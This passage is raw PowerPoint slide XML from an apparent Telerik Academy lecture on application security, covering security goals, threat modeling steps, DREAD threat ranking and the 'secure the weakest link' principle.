            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to Authorized People</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ready for Use when expected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non Repudiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Exchange with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>proof</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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705600" y="4421111"/>
            <a:ext cx="1837716" cy="1989138"/>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074384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752600"/>
            <a:ext cx="7924800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Threat Modeling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13314" name="Picture 2" descr="http://www.anstechnology.net/wp-content/plugins/wp-portfolio/cache/45fc007c51dfe23d3b359a17c7525609_cd9a2dc97b928d83bf8db69dd7218530.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48000" y="3352800"/>
            <a:ext cx="3048000" cy="2286001"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="1016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82137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3419475" y="228600"/>
            <a:ext cx="5565775" cy="877887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Is Your Application “Secure”?</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1628775"/>
            <a:ext cx="8207375" cy="4895850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ever have anyone ask you this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There’s an easy answer: NO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are no “Secure” apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But there are apps that are secure enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to achieve enough security?</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0" smtClean="0"/>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086600" y="2514600"/>
            <a:ext cx="1219200" cy="1579418"/>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729412" y="2514600"/>
            <a:ext cx="714375" cy="699796"/>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89384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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Lectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="932331"/>
            <a:ext cx="7581900" cy="5764304"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Nikolay Kostov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="bg-BG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Team Lead, Senior Developer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>and Trainer @ Telerik Academy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
            </a:b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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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313543" y="1305040"/>
            <a:ext cx="1817459" cy="2218267"/>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0465575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3419475" y="228600"/>
            <a:ext cx="5565775" cy="877887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>What Does “Secure Enough” Mean to You?</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1557338"/>
            <a:ext cx="8207375" cy="4824412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nobody has an infinite security budget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many folks would be happy if they had </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>budget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Be practical!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Get the most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>bang for your buck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074"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010400" y="5016500"/>
            <a:ext cx="1857375" cy="1403350"/>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436925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Threat Modeling?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Threat modeling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>evaluating a software system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>an be considered as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>variation of formal reviews</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>review team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>looks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for areas of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>product's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>feature set that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>susceptible to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>security vulnerabilities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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1435630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3419475" y="341313"/>
            <a:ext cx="5565775" cy="877887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Threat Modeling Concepts</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="4000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1412875"/>
            <a:ext cx="8207375" cy="5111750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Threat modeling helps you find what is “secure enough”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What are you trying to protect?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Who is likely to attack you?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>What avenues of attack exist?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Which vulnerabilities are the highest risk?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Go after the high risk vulnerabilities first!</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37917244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3419475" y="341313"/>
            <a:ext cx="5565775" cy="877887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Approaches to Threat Modeling</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1412875"/>
            <a:ext cx="8207375" cy="5111750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="45000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t have a security expert?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="45000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Use Microsoft Patterns &amp; Practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="45000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0" smtClean="0"/>
              <a:t>Threat Modeling Web Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="45000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://msdn2.microsoft.com/en-us/library/ms978516.aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="45000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Security guidance put together by well-known experts</a:t>
            </a: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315200" y="3048000"/>
            <a:ext cx="1255512" cy="1422400"/>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36072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 Modeling Steps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Threat modeling follows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> few steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assemble the threat modeling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>architecture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>verview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decompose the a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pplication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify the t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hreats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Document </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hreats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rank the threats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pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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rot="2682464">
            <a:off x="6821961" y="2727600"/>
            <a:ext cx="904875" cy="1914525"/>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1878419">
            <a:off x="6629400" y="4800600"/>
            <a:ext cx="904875" cy="1914525"/>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79418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 Ranking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Threats are not equally important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A way to rank the threats is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DREAD formula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– using these criteria:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>amage potential</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>eproducibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploitability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Affected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discoverability</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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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129825" y="3048000"/>
            <a:ext cx="4597376" cy="3419019"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3707306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Golden Rule 2:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure the Weakest Link</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1202284"/>
            <a:ext cx="8686800" cy="5350916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hackers attack where the weakest link is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find the weakest security link of your application and secure it as best as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After you harden the weakest link, another one becomes the weakest one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26</a:t>
            </a:fld>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181600" y="4157167"/>
            <a:ext cx="3276600" cy="2319833"/>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6372" y="5257800"/>
            <a:ext cx="2272281" cy="1476375"/>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635828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676400"/>
            <a:ext cx="7924800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Testing Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
